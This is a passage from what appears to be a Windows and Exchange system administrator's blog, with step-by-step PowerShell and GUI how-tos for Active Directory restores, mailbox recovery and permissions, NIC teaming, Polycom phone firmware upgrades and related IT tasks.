> Modify • -for ATTRIBUTES, type: isDeleted • -for OPERATION, bullet DELETE • -click ENTER Now we have to tell AD where to restore the user. • -for ATTRIBUTES, type: distinguishedName • -for VALUES, type the original DN of the object. • You can find the last-known distinguishedName by looking on the right-hand side. It will say "lastKnownParent". Simply add the user name before. For example: CN=foo user,OU=whatever,OU=wherever,OU=allUsers,DC=daknetworks,DC=com • -for OPERATION, bullet REPLACE • -click ENTER • -checkmark EXTENDED (lower-left). • -click RUN. The user is restored successfully to the OU you defined. You might have to re-add some info and re-enable the Exchange mailbox. Recover Deleted Items from Exchange 2013 | Recover Deleted Items from Outlook2013 | Recover Deleted Items from Outlook 2016 Recover Deleted Items from Exchange 2013 | Recover Deleted Items from Outlook2013 | Recover Deleted Items from Outlook 2016 DEFINITIONS DELETE - deletes the messages from the folder. Moves the messages into the DELETED-ITEMS folder (or the TRASH folder). RETENTION - the time that you can recover items even if the messages were permanently-deleted (or deleted from the DELETED-ITEMS folder). DISCOVERY Exchange 2013 will have a RETENTION time for permanently-deleted messages. This setting is on the MAILBOX-DATABASE and not on the MAILBOX or individual account. To see the settings, first find all the MAILBOX-DATABASEs names and their retention time: -get-mailboxdatabase |select Name,DeletedItemRetention It will spit out something like: Name DeletedItemRetention ---- -------------------- Mailbox A 14.00:00:00 Mailbox B 14.00:00:00 Mailbox C 14.00:00:00 Great! You know that you have 14 days to retrieve something that was deleted. SET RECOVERY If you need to set recovery on a MAILBOX-DATABASE to say 30 days or if a retention is not set and you need to set it: set-mailboxdatase "mailbox b" -DeletedItemRetention 30.00:00:00 (days.hours:minutes:seconds) RECOVER IN OUTLOOK 2013 | RECOVERY IN OUTLOOK 2016 -click DELETED-ITEMS (on the left-hand side). -click RECOVER-DELETED-ITEMS-FROM-SERVER (at the top). You should see a list of the messages from the last 2 weeks. -control-click to select the messages you want. -click OK to restore them. It should put them back into the folder where they went missing. RECOVER IN EXCHANGE 2016 If that's too much trouble for the person, then you can do it on their behalf in the EMS. This will put all the recovery items in the user's mailbox in a recovery-folder called 'foo.user.recovery': Search-Mailbox foo.user -SearchDumpsterOnly -TargetMailbox foo.user -TargetFolder foo.user.recovery -LogLevel Full And if you really want to search through the recovery items and restore them: Search-Mailbox foo.user -SearchQuery "sent: '04/10/17' AND from: 'foo.sender'" -TargetMailbox foo.user -TargetFolder "foo.user.recovery" -LogLevel Full Create a NIC Team, Create NIC Bond, Create Load-Balancing, LBFO, For Hyper-V Here's how to create a NIC Team/NIC Bond/Load-Balancing/LBFO setup. This setup is then used in a virtual machine enviroment for all the VM's to use. First update drivers to INTEL newest drivers v21.1. We will be using LBFO (LOADBALANCING-FAILOVER) which is built into Windows Server rather than INTEL ANS (Advanced Networking Services) which is built into the Intel driver. The reason for this is that ultimately there are too many issues if you do not use what is built into the Windows OS. Updates and other items will keep having trouble with INTEL ANS. Remove Existing Settings -remove static settings from existing nics. -remove virtual switch in Hyper-V. Establish New Settings in PowerShell -first, see the network adapters you have: get-netadapter -renamed nic1 to TeamNic1: rename-netadapter "Local Area Connection" "TeamNic1" -renamed nic2 to TeamNic2: rename-netadapter "Local Area Connection 2" "TeamNic2" -created nic team with name ManagementTeam: new-netlbfoteam -Name "ManagementTeam" -TeamMembers TeamNic1,TeamNic2 -TeamingMode SwitchIndependent -LoadBalancingAlgorithm TransportPorts -created virtualswitch called ConvergedNetSwitch: New-VMSwitch "ConvergedNetSwitch" -MinimumBandwidthMode weight -NetAdapterName "ManagementTeam" -click SERVER-MANAGER (the management gui in Windows Server that shows when you start the server) -click LOCAL-SERVER (on the left-hand side). -find NIC-TEAMING (at the top section) -click ENABLED (next to NIC-TEAMING) (a windows shows) -right-click on MANAGEMENTTEAM (lower-left) > click PROPERTIES -click ADDITIONAL-PROPERTIES (at the bottom). -set SWITCH-INDEPENDENT -set ADDRESS-HASH (if you set to the HYPER-V-PORT setting, each VM will be assigned to a specific NIC). -set STANDBY as NONE To Verify New Settings -type: get-VMSwitch |fl -here's my output: ComputerName : foo Name : ConvergedNetSwitch Id : d64482dc-d6d4-4b64-8d24-4105c1ef80a4 Notes : SwitchType : External AllowManagementOS : True NetAdapterInterfaceDescription : Microsoft Network Adapter Multiplexor Driver AvailableVMQueues : 63 NumberVmqAllocated : 3 IovEnabled : False IovVirtualFunctionCount : 0 IovVirtualFunctionsInUse : 0 IovQueuePairCount : 0 IovQueuePairsInUse : 0 AvailableIPSecSA : 2048 NumberIPSecSAAllocated : 0 BandwidthPercentage : 100 BandwidthReservationMode : Weight DefaultFlowMinimumBandwidthAbsolute : 0 DefaultFlowMinimumBandwidthWeight : 1 Extensions : {Microsoft NDIS Capture, Microsoft Windows Filtering Platform} IovSupport : False IovSupportReasons : {This network adapter does not support SR-IOV.} IsDeleted : False Start New Settings -rebooted to make sure it survives a reboot. NOTES ***To be clear, this is set for LOAD-BALANCING (not FAILOVER).*** We would need another NIC to enable failover. Simply add the NIC to the team. Then choose that NIC to be the STANDBY ADAPTER. A real team/bond requires configuration on the switchs (or more specifically on the switch ports) to create an EtherChannel. If you are to do this, make it easy on yourself and make certain all the switches are the same model. Then make certain all have the same OS before stacking. Once stacked, configure the EtherChannel. Outlook 2016 Calendar Sharing - "You Don't Have Permission To Create An Entry In This Folder" Outlook 2016 Calendar Sharing - "You Don't Have Permission To Create An Entry In This Folder" SCENARIO You try and share a calendar in Outlook 2016. When the person who has EDITOR accessrights adds the shared calendar to their Outlook, they get the following message: "You Don't Have Permission To Create An Entry In This Folder...." RESOLUTION There can be many reasons why this is happening. Ultimately it is a permission issue or a cache permission issue. 1-check to see if the calendar has the correct permissions. Show Calendar Permissions Get-MailboxFolderPermission foo.user:\calendar Add Calendar Permissions Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor The non-working mailbox calendar has the correct permissions and it still doesn't work. 2-temporarily change the primary smtp address on the shared account. Don't ask me why but I've witnessed that if the shared account ( This e-mail address is being protected from spambots. You need JavaScript enabled to view it ) changes the primary smtp email address domain ( This e-mail address is being protected from spambots. You need JavaScript enabled to view it ) sometimes the person trying to access the calendar can suddenly edit the calendar if they remove the calendar and add it back in. Here's how... On OUTLOOK where you are trying to access the shared calendar: -click CALENDAR (bottom-left). -find OTHER CALENDARS. -right-click on the calendar-name. -click DELETE CALENDAR (don't worry, this only removes the calendar. It doesn't actually delete the calendar). -close OUTLOOK. -change primary smtp via ECP (web interface) from This e-mail address is being protected from spambots. You need JavaScript enabled to view it to: This e-mail address is being protected from spambots. You need JavaScript enabled to view it -open OUTLOOK. -be sure address is updated in ADDRESS-BOOK (global-address-list). -click CALENDAR (bottom-left). -find OTHER CALENDARS. -right-click OTHER CALENDARS > ADD CALENDAR > OPEN SHARED CALENDAR. -type in the name of the person. -click OK. -wait about 10 seconds. WORKS WITH NEW DOMAIN!!! And can edit the calendar. -remove the shared calendar (same as above). -change primary smtp via ECP (web interface)from This e-mail address is being protected from spambots. You need JavaScript enabled to view it to: This e-mail address is being protected from spambots. You need JavaScript enabled to view it -added calendar (same as above). WORKS WITH ORIGINAL DOMAIN!!! And can edit the calendar. It is important to note that changing via Exchange Management Shell (EMS) did not work and resulted in the original error.$Set-Mailbox foo.user -PrimarySmtpAddress This e-mail address is being protected from spambots. You need JavaScript enabled to view it $Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 I'm not sure if this is an emailaddresses issue. Or a missing value in one of the keys that is changed in the ECP and not in the EMS. Or if it is a global-address cache issue. Or if it a GAL sync issue that takes time. All I can tell you is that I performed the steps above and it worked. Took me a good 30 hours or so to figure that out. In any event, I checked the following but nothing produced any meaningful results concerning this issue:$Get-mailboxpermission foo.user |fl $Get-Mailbox foo.user| Select-Object -ExpandProperty EmailAddresses$Get-CalendarProcessing foo.user |fl $Get-CASmailbox foo.user| fl 3-check the offlineaddressbook setting for the mailboxdatabase Somewhere along the line during initial install, a CU update or creation of a new mailboxdatabase, the OFFLINEADDRESS book key is blank/null. I think it would automatically default to the default address book but I really don't know. I haven't found any info that says have a null value is bad but most info I see says to set it for all mailboxdatabases. Find the name of the OFFLINE ADDRESS BOOK: Get-OfflineAddressBook |select name Now set the MAILBOXDATABASE to use that name: Get-Mailboxdatabase | Set-MailboxDatabase -OfflineAddressBook “Default Offline Address Book (Ex2013)” NOTES Calendar Permissions can be set individually or by role. The DEFAULT permissions are: ReadItems, CreateItems, EditOwnedItems, EditAllItems, CreateSubfolders, FolderVisible Or another way to view the DEFAULT role is like this (the minus is what the role doesn't have): ReadItems CreateItems EditOwnedItems EditAllItems CreateSubfolders FolderVisible -DeleteOwnedItems -DeleteAllItems -FolderOwner -FolderContact The EDITOR role permissions are: ReadItems, CreateItems, EditOwnedItems, EditAllItems, FolderVisible, DeleteOwnedItems, DeleteAllItems Or another way to view the EDITOR role is like this (the minus is what the role doesn't have): ReadItems CreateItems EditOwnedItems EditAllItems -createsubfolders FolderVisible DeleteOwnedItems DeleteAllItems -FolderOwner -FolderContact GET PERMISSION TO MAILBOX Sometimes getting the permissions to the mailbox helps: Get-MailboxPermission foo.user GET PERMISSION TO MAILBOX THAT IS ANOTHER USER Sometimes it helps to see who else has permission to the mailbox: Get-MailboxPermission foo.user |? {$_.IsInherited -ne "true" -and $_.User -ne "NT AUTHORITY\SELF"} CHANGE PERMISSION TO MAILBOX Sometimes you need to change permissions on the mailbox: Set-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess ADD PERMISSION TO MAILBOX Add-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess REMOVE PERMISSION TO MAILBOX remove-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess SEE COMPLETE FOLDER STRUCTURE Sometimes, seeing the complete folder structure of the mailbox helps: get-MailboxFolder foo.user:\ -recurse GET THE CALENDAR NAME Sometimes getting the calendar name helps because it is changed from another language: Get-MailboxFolderStatistics foo.user |where-object {$_.FolderType -eq "Calendar" } |select-Object Name Sometimes you need to add permissions to the calendar: Add-MailboxFolderPermission foo.user:\calendar -User foo.user2 -AccessRights Editor REMOVE CALENDAR FOLDER PERMISSIONS Sometimes you need to remove permissions to the calendar: remove-MailboxFolderPermission -Identity foo.user:\calendar -User foo.user2 SEE MAILBOXES IN ORGANIZATIONAL UNIT Sometimes you need to see the email in a single AD OU: get-mailbox -OrganizationalUnit "ou=where-ever,ou=whatever-users,dc=domain,dc=tld" -resultsize unlimited |get-mailboxstatistics |ft DisplayName,TotalItemSize,Itemcount REMOVE CACHE SHARED CALENDAR FOLDERS IN OUTLOOK 2016: Sometimes working off of cached shared calendar folders causes an issue and you need to remove the cache folders from OUTLOOK 2016: -account-settings > email  > change > more-settings > advanced -restart OUTLOOK REMOVE CACHE FOLDERS IN OUTLOOK 2016: Sometimes working off of cached folders causes an issue and you need to remove all the cache folders from OUTLOOK 2016: -account-settings > email  > change -uncheck "Use Cached Exchange Mode" -click NEXT > FINISHED -restart OUTLOOK Windows Server 2012 Connect Branch Office to HQ Domain And Replicate Domain And Replicate DNS Windows Server 2012 Connect Branch Office to HQ Domain And Replicate Domain And Replicate DNS I had new 10K server and wanted to test out before making changes. The goal is to turn it into a VM. Test out connecting to the HQ domain and replicate the domain and dns. In this situation the branch office already had a domain. The location was purchased by HQ and needed to roll into the HQ domain. Couple of notes before we begin: -keep your domain flat. If you can, do NOT do subdomains, trusts, etc. It's too much of a pain later on. Keep it simple. -you can have 2 domains on the same network (just not 2 DHCP servers). CREATE VIRTUAL MACHINE HYPER-V is included in WINDOWS-10. So all we have to do is create a new VHDX from the existing SDD that came with the server. -connect SDD to WINDOWS-10 via USB caddy. -created server-2012r2 vm with DISK2VHD (you only need the main partition). -started HYPER-V -created new VM (do not import, etc). -attached newly created VHDX, no-network, 4 processors, 10GB ram. -booted for first time. -shutdown. -create VSWITCH external-network & allow-management-operating-system-to-share-this-network-adapter (no vlan id). -attached VSWITCH to VM. -on hq ad server: ad-sites-services > subnets > create subnets-for-branch-office & attach to branch-office -on hq ad server: ad-sites-services > inter-site-transports > ip > create new > hq/branch > 15 mins JOIN BRANCH OFFICE SERVER TO HQ DOMAIN Simple enough but if you've never done it before you might be thinking there's something more to it. There isn't. -start VM -change dns to dns at hq -join domain -restart PROMOTE BRANCH OFFICE SERVER AS DOMAIN CONTROLLER -click NEXT > NEXT > NEXT -click ACTIVE-DIRECTORY-DOMAIN-SERVICES -let it go through its setup. -click promote to DOMAIN-CONTROLLER (upper-right flag) -select DNS SERVER & GC (global catalog) -except defaults until INSTALL. -click INSTALL -wait -server reboots REPLICATE BRANCH OFFICE SERVER DOMAIN CONTROLLER -check USERS&COMPUTERS to see if in DOMAIN-CONTROLLERS -check SITES&SERVICES -view all servers are correct. -click NTDS SETTINGS -right-click right-panel -click REPLICATE-NOW -cycle through all NTDS SETTINGS -right-click NTDS-SETTINGS > ALL-TASKS > CHECK-REPLICATION-TOPOLOGY -cycle through all NTDS SETTINGS (on the new server, the largest delta is 'unknown') -click NTDS SETTINGS -right-click right-panel -click REPLICATE-NOW (on the new server, notice the time is now a few seconds) High-five!!! NOTES: CTS2600 I have a storage array with 12 3.5" drives. It's a little older but it works. It has an LSI sticker on it. I pop in some hard drives, plug in the Ethernet connection and power it on. Now, how do I control it? There is no monitor connection. So, I look at the DHCP find the ip address. I put the ip address in the browser but nothing shows. With a tool, I see that it is showing as a NETAPP device. Hmmm... I thought it was LSI but OK. I do a little googling and find that NETAPP purchased the storage array division from LSI. So I go to the NETAPP (who acquired LSI) web site for support. I see that it needs a program called SANTRCITY. SANTRICITY isn't offered as a free download, I have to register for it. No problem. I provide the SERIAL-NUMBER on the device and wait. I receive a message from NETAPP stating that they won't provide support since they made it for someone else who branded it as their own. Also known as an OEM. It even states in their LSI acquire document: http://mysupport.netapp.com/NOW/public/apbu/oemcp/NetApp_Engenio_Support_Integration_FAQ.pdf But who is the OEM? I don't know. There are no markings on the device. This OEM is supposed to provide SANTRICITY or a rebrand of the app to control the storage device. I find out that the device is actually an LSI CTS2600. The LSI CTS2600 was made for DELL as the POWERVAULT MD3200. I download the DELL software but it doesn't find the array that is booted. I try a couple more times without success. I finally hear back from NETAPP that the OEM is BLUEARC. Great! A little more googling and I see that it is a BlueArc Mercury 50. BLUEARC was purchased by HITACHI. Humph... Siging up for the access to Hitachi support web site. The BLUEARC software was incorporated into HITACHI COMMAND SUITE. Support writes back that there is no support contract on the device so they will not provide any help. Now I have a 20K SAN that boots and physically works but I have no way to control it or manage it. In other words, I have a 20K boat anchor. Good thing there are FTP sites with admins that don't lock them up :-) System Volume Information Folder Size If you are "missing" free space, and only have a few GB left when you should have many GB left (or TB), the culprit could likely be: • -permission issue. You cannot see the size of a folder if you do not have read permissions to access the folder. You can see if there are SHADOWS by following the instructions in the previous post. One item that VSSADMIN and DISKSHADOW will not show is the size of the SHADOW. Bummer. The Windows OS saves these SHADOWS in the SYSTEM VOLUME INFORMATION folder. For various reasons, a typical administrator does not have permissions to that folder. This causes an issue because you cannot know the size of the folder through EXPLORER. So how do you know the size of the SYSTEM VOLUME INFORMATION folder? Here's how using robocopy: • robocopy "c:\System Volume Information" c:\dummy /l /xj /e /nfl /ndl /njh /r:0 /b For most other items, WINDIRSTAT will show you the way. A shadow is copy of file or a volume. This can be done even while the file is in use. The proper name for this is Volume Snapshot Service  or Volume Shadow Copy Service or VSS. And it works at a block level (rather than a file level). There are a couple of parts to this but the heart of the technology is the VOLUME SHADOW COPY SERVICE which performs the actual copy. The transfer of the data is called a PROVIDER. While Windows comes with its own PROVIDER, other software companies can create their own providers. An example of a built-in PROVIDER is SYSTEM RESTORE or PREVIOUS VERSIONS for a file or folder. An example of an outside software company is SHADOWPROTECT. While SHADOWPROTECT is an outside company, it still relies on VSS to create the shadow on its behalf. SHADOWPROTECT does not create its own shadow. The shadows are traditionally managed by VSSADMIN. Here's how to show all PROVIDERS in either powershell or command-line: And here's how to show the SHADOWS: And here's how to show the SHADOW storage: VSSADMIN is not the only tool. Another tool gives more info. That is DISKSHADOW. DISKSHADOW is a interactive command interpreter like DISKPART. What I've found is that DISKSHADOW is a more accurate and more powerful tool. Here's how to enter DISKSHADOW interactive: Here's how to show all PROVIDERS: Here's how to show all SHADOWS: It will show all the SHADOWS, if it is created for a builtin provider or for an 3rd party provider. And it will show the provider ID for each shadow. To add info, you should be able to limit the size of a shadow: • -computer-management • -right-click SHARD-FOLDER (on the left-hand side) • -click SETTINGS for each drive and adjust the size as you see fit. NOTE: you can also do this on the DISK-MANAGEMENT snap-in. Upgrading Polycom Phones Across Entire Location Upgrading all the Polycom phones across an entire location has been a mission. Again, there's so much mis-information and different setups it is hard to weed through it all. In short, you need 2 files uploaded to your phone-server for each model of phone-set. The 2 files are: • the sip/uc-software/application (sip.ld) file. (or if you have a SoundStation 6000/7000, you need the B version here: 2345-12560-001.bootrom.ld 3-Take all the BOOTROM files and upload them to your phone-server (provisioning server) in the tftpboot directory. (fyi - the tftpboot directory will be at the root of the filesystem: /tftpboot.) The chart below will show what bootrom goes with what phone-set model. FILES DESCRIPTION bootrom.ld Concatenated BootROM 2345-12345-001.bootrom.ld ????? (Probably SoundPoint IP 300/302/320/330) 2345-12360-001.bootrom.ld SoundPoint IP 321 2345-12365-001.bootrom.ld SoundPoint IP 331 2345-12375-001.bootrom.ld SoundPoint IP 335 2345-12450-001.bootrom.ld SoundPoint IP 450 2345-12500-001.bootrom.ld SoundPoint IP 550 2345-12560-001.bootrom.ld SoundPoint IP 560 2345-12600-001.bootrom.ld SoundPoint IP 650 2345-12670-001.bootrom.ld SoundPoint IP 670 3111-15600-001.bootrom.ld SoundStation IP 6000 3111-30900-001.bootrom.ld SoundStation IP 5000 3111-40000-001.bootrom.ld SoundStation IP 7000 3111-19000-001.sip.ld SoundStation Duo 3111-46135-002.sip.ld VVX 300 3111-46161-001.sip.ld VVX 310 3111-46157-002.sip.ld VVX 400 3111-46162-001.sip.ld VVX 410 3111-44500-001.sip.ld VVX 500 3111-44600-001.sip.ld VVX 600 2345-17960-001.sip.ld VVX 1500 3111-36150-001.sip.ld SpectraLink 8440 3111-36152-001.sip.ld SpectraLink 8450 3111-36154-001.sip.ld SpectraLink 8452 3111-33215-001.sip.ld SoundStructure Great! You are halfway there. THE SIP.LD FILE 1-First, look at the Polycom Matrix for older phones (ie SOUNDPOINT/SOUNDSTATION phones) here: Or the Polycom Matrix for newer phones (ie VVX phones) here: (Hopefully it's obvious, the MS Lync is for MS Lync servers. If you do not know what that is, don't worry about it as it is not the one you need). (As of this writing the Current General Availability for SOUNDPOINT phone-sets is v4.0.11). 3-unzip the download and inside the folder, you will see SIP.LD files like: 2345-12560-001.sip.ld 4-Take all the LD files and upload them to your phone-server (provisioning server) in the tftpboot directory. 5-Once there, rename the file according to your system. I had to rename the files as such: sip.SPIP560.4.0.11.revc.ld REBOOT Now reboot the phone. It should upgrade the bootrom and then upgrade the application/sip.ld. This process may take around 10 minutes per phone. If you have a POE switch, you can do this across the network by unplugging the POE switch. Wait about 1 minute. Plug the POE switch back in. Then wait about 15 minutes for all the phone to upgrade. (Of course, wait for after hours time period.) CONFIG FILES From here, there might be some troubleshooting. Namely, some of the old config files may not work with the most recent firmware. Edit the files accordingly in the tftpboot directory. Each phone will have a MAC-address number on the back. Something like, 0004123EDT78. So, each phone will have a base-config file of mac-number.cfg. Something like, 0004123EDT78.cfg This file will determine what SIP.LD file to use and what further config files to use. Before the update, the contents will look something like this: <APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].3.2.3.revc.ld" CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.3.2.3.revc.cfg" MISC_FILES="0004123EDT78-directory.xml" LOG_FILE_DIRECTORY="" OVERRIDES_DIRECTORY="" CONTACTS_DIRECTORY="" LICENSE_DIRECTORY=""> <APPLICATION_SPIP300 APP_FILE_PATH_SPIP300="sip.2.2.ld" CONFIG_FILES_SPIP300="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/> <APPLICATION_SPIP500 APP_FILE_PATH_SPIP500="sip.2.2.ld" CONFIG_FILES_SPIP500="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/> </APPLICATION> After the update, you need to edit the file to look something like this: <APPLICATION APP_FILE_PATH="sip.[PHONE_MODEL].4.0.11.revc.ld" CONFIG_FILES="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.4.0.11.revc.cfg" MISC_FILES="0004123EDT78-directory.xml" LOG_FILE_DIRECTORY="" OVERRIDES_DIRECTORY="" CONTACTS_DIRECTORY="" LICENSE_DIRECTORY=""> <APPLICATION_SPIP300 APP_FILE_PATH_SPIP300="sip.2.2.ld" CONFIG_FILES_SPIP300="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/> <APPLICATION_SPIP500 APP_FILE_PATH_SPIP500="sip.2.2.ld" CONFIG_FILES_SPIP500="deviceset-12345.cfg, phone-0004123EDT78.cfg, sip.2.2.cfg"/> </APPLICATION> You can do this file-by-file if needed. Or you can run one command on the phone-server. 1-make sure you are in the tftpboot directory 2-make a directory for the backup of the files: mkdir cfgfiles 3-copy all the base config files into this directory: cp ./000*.cfg ./cfgfiles 4-change all the files at once: sed -i -e "s/3.2.3/4.0.11/g" ./000*.cfg This will update all the base-config files to tell the phone-sets to use the new bootrom/updater files. PHONE OVERRIDE FILES Phone override files are changes made from the phone-set and are named <MAC Address>-phone.cfg. So something like, 0004123EDT78-phone.cfg On my phone-server, the older phone override files were named phone-0004123EDT78.cfg If they have parameters older than v3.3.0, you will get an error message. To fix, see below in the "UPDATE CONFIG FILE WITH UTILITY" section. WEB OVERRIDE FILES If you change something via the phone-set web interface, it will save the settings in a web-override file named <MAC Address>-web.cfg. So something like, 0004123EDT78-web.cfg UPDATE CONFIG FILE WITH UTILITY If you have an older config file, the Polycom phone-set will give an error. Something like, "phone-0004123EDT78.cfg is pre-3.3.0 params." Basically it is saying that you are trying to config a parameter that doesn't exist. Consequently, you will have to update your config files to remove those parameters with a software utility called: CFCUtility. http://support.polycom.com/PolycomService/support/us/support/eula/ucs/UCConfig_agreement.html Once you download and unzip, you will have to convert the config-files. -make sure you are in the tftpboot directory. -make a backup directory: mkdir cfgphonefiles -copy all the phone files to this directory: cp ./phone-* ./cfgphonefiles/ -on a Windows system, in the CFCUtiliy, create a folder called "files". -gather all the config-files in the folder called "files". (this can be done by mounting, ftp, scp, etc) -from a Windows command-line change to the cfcutility folder -type: cfcUtility.exe -t ./files -it will ask you some generic questions and accept the default. -now transfer the files back to the phone-server in the tftpboot directory. -reboot the phone(s). (remember, if you have a POE switch unplug the switch and plug back in for a network-wide solution) -it will reboot 2 or 3 times on it's own. SUMMARY In the tftpboot directory, you will have some files for each phone-set: 0004123EDT78.cfg (the update base config. The backup is in the cfgfiles directory) 0004123EDT78-directory.xml 0004123EDT78-phone.cfg (the new phone override, used automatically) 0004123EDT78-web.cfg (the new web override, used automatically) phone-0004123EDT78.cfg (the old phone override, used by the base-config file. This file is converted and a backup is in the cfgphonefiles directory) For newer phone-sets with updated firmware versions, simply redirect the provisioning server to: voipt2.polycom.com/<version-number> 1. go to phone 3. change Server Type to HTTP. 4. type: voipt2.polycom.com (for Server Address) • Example: to load the latest SIP 4.04 = voipt2.polycom.com/404 • Example: to load the latest SIP 4.0.11 = voipt2.polycom.com/4011 5. reboot the phone-set 6. wait 15 minutes 7. once updated, change the server back to the local provisioning-server For a current live directory list go here: http://voipt2.polycom.com/WEBCONTENT/directory.html NOTES: -the config files are explained here: http://documents.polycom.com/topics/139356 Update the ADMX Templates in Windows Server to Apply GPO to Windows 10 Updating the ADMX Templates in Windows Server to Apply GPO to Windows 10 is a manual process. A Windows Server can control Windows client computers through Group Policy/Group Policy Objects (GP/GPO). It does this through template files called ADMX files. These ADMX files simply correspond to registry-edits (regedits). Since not all regedits are available on OS versions (for example, controlling OneDrive was included along the way), there is a set of ADMX files for common milestones like: • -Windows 7 • -Windows 7 SP1 • -Windows 8 • -Windows 8.1 • -Windows 10 • -Windows 10 (1511) • -Windows 10 (1607) Anniversary Update The ADMX files are not automatically updated on the Windows Server. They must be manually updated. The updates are in MSI files (and not zipped files). The instructions are pretty simple once someone shows you: • -install the ADMX msi (this will unpack the ADMX files in a folder called "Policy Definitions"). • -copy the entire contents to: C:\Windows\SYSVOL\sysvol\domain-name\Policies\PolicyDefinitions\ You can find the ADMX files here: -Windows 10 (1511) -Windows 10 (1607) Anniversary Update This video explains it better than I can: Creating Shares On Server 2012 Many experience admins get this wrong. Here's how to do it right. There are a 5 parts to this. CREATE THE GROUP • -click ACTIVE-DIRECTORY-USERS-AND-COMPUTERS. • -create an GROUP (aka SECURITY-GROUP). CREATE THE SHARE • -create a folder. • -right-click to PROPERTIES > SHARING. • -checkmark SHARE-THIS-FOLDER. • -if hidden, add a $at the end. ADD SHARE PERMISSIONS • -click PERMISSIONS. • -remove all groups/users. • -add the GROUP required for this share. • -checkmark FULL-CONTROL. • -click OK > OK. ADD NTFS PERMISSIONS • -click SECURITY tab (at the top). • -click ADVANCED (at the bottom). • -click DISABLE ENHERITANCE. • -click CONVERT INHERITED PERMISSIONS INTO EXPLICIT PERMISSIONS. • -remove all groups/users except SYSTEM. • -add the GROUP required for this share. • -checkmark FULL-CONTROL. • -click OK > APPLY. TEST PERMISSIONS • -click the EFFECTIVE ACCESS tab (at the top). • -test the user/group you want to make sure can access. NOTES: • -the EVERYONE group does not include everyone. This is why it should not be used. • -the most restrictive permissions win. • -the group is assigned to the user upon login. Consequently, the user will have to logout and login again to test if the share is working. Find the FSMO in Your Domain You have multiple servers. Despite there being a sync between them, only one can be the master for certain operations. For example, only one server can hold the official invitation list. The other bouncers will have to check the master list. This master is called the FSMO. So how do you know which server is the FSMO? How do you find the FSMO in your domain? Here's how: • open cmd • type: netdom query fsmo You can also: • -open ACTIVE-DIRECTORY-USERS-AND-COMPUTERS. • -right-click on the domain-name (on the left-hand side). • -click OPERATIONS MASTER. • -it should show you there as well. At the different tabs at the top, you can select which OPERATION you are interested in. There are other ways as well. Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update) Black Screen of Death on Windows 10 v1607 Update (aka Anniversary Update - a Feature Update) upon reboot. The only way to get out of it is to power down the computer. Upon reboot, the computer will revert to the previous version of Windows 10 v1511. So how to get Windows 10 v1607 Update (aka Anniversary Update) to install? -start the update. -manually reboot to finish. -before it reboots, unplug the USB dongle for the Logitech wireless mouse or wireless keyboard. -the update will install. Intel HD Graphics on Windows 10 64-bit In the spirit of "just show me how to fix it" I will be succinct. The older Intel HD Graphics 3000 (or Sandy Bridge) is no longer working in WINDOWS-10(v1607). It used to work in WINDOWS-10(v1511) but INTEL is pushing foreword. The same is true for Intel HD Graphics 2000 and HD Graphics. This is basically the Intel 6 Generation Chipset. -Intel refuses to produce drivers for this graphics card on it's own but has released a driver and provided it to MS. -the driver is version 9.17.10.4459. -the driver has to be gotten from MS and not from INTEL: http://catalog.update.microsoft.com/v7/site/Search.aspx?q=9.17.10.4459 (it is named: 200028694_9f1eae50bc588760715acd70172f5487dc461e64) CASE-1 -INTEL GRAPHICS HD 3000 -black screen of death trying to update to WIN-v1607. -the driver is v9.17.10.4299. -had to manually untar the cab. -had to manually update the driver to v9.17.10.4459 -also installed the latest CHIPSET driver for QM67 (intel 6 series). CASE-2 -INTEL GRAPHICS HD 2000 -black screen of death trying to update to WIN-v1607. -the driver is v9.17.10.4299. -had to manually untar the cab. -had to manually update the driver to v9.17.10.4459 -also installed the latest CHIPSET driver for Q65 (intel 6 series). CASE-3 -INTEL GMA 4500 (g41 chipset) -black screen of death trying to update to WIN-v1607. -the driver is v8.15.10.2702 -make sure KB3176938 is installed. NOTES: -use HWINFO to find out details of your computer. -https://en.wikipedia.org/wiki/List_of_Intel_graphics_processing_units -https://en.wikipedia.org/wiki/List_of_Intel_chipsets Office365 Options Office365 has many options and it can be confusing on their web site. Here's an easy to read all-in-one page to quickly identify your needs: EXCHANGE-1 EXCHANGE-2 OFFICE-365-ESSENTIALS OFFICE-365-BUSINESS OFFICE-365-PREMIUM OFFICE-365-PROPLUS OFFICE-365-E1 OFFICE-365-E3 OFFICE-365-E5 cost-montly$4.00 $8.00$5.00 $8.25$12.50 $12.00$8.00 $20.00$35.00 cost-annual $48.00$96.00 $60.00$99.00 $150.00$144.00 $96.00$240.00 $420.00 exchange YES YES YES NO YES NO YES YES YES mailbox-size 50GB 100GB 50GB 0GB 50GB 0GB UNLIMITED UNLIMITED UNLIMITED apps-online NO NO YES YES YES YES YES YES YES apps-desktop NO NO NO YES YES YES NO YES YES onedrive NO NO YES YES YES YES YES YES YES onedrive-size 0TB 0TB 1TB 1TB 1TB 1TB 1TB 1TB 1TB shared contacts YES YES YES NO YES NO YES YES YES shared calendar YES YES YES NO YES NO YES YES YES maximum users UNLIMITED UNLIMITED 300 300 300 UNLIMITED UNLIMITED UNLIMITED UNLIMITED NOTES: Exchang 2013 Change Primary SMTP Email Address Exchang 2013 Change Primary SMTP Email Address You might get the following, "Couldn't update the primary SMTP address because this mailbox is configured to use an e-mail address policy." Here's how to fix: Set-Mailbox foo.user -PrimarySmtpAddress This e-mail address is being protected from spambots. You need JavaScript enabled to view it -EmailAddressPolicyEnabled$false Or if you need to set all the addresses for one mailbox all at once (the captial SMTP is the primary smtp address and the lowercase smtp is the additional smtp email addresses): Set-Mailbox foo.user -EmailAddresses smtp:foo.user@domain1, smtp:foo.user@domain2, SMTP:foo.user@domain3 -EmailAddressPolicyEnabled $false Grab All The Photos From A Web Site So you want to grab all the photos from a web site do you? Here's how: wget -nd -r -A jpg -e robots=off http://wherever.tld This will put all the photos from the web site you reference (and all lower directories) to a single directory. This will not magically grab photos from a directory which has no page attached to it and has random names. If you do know the names are 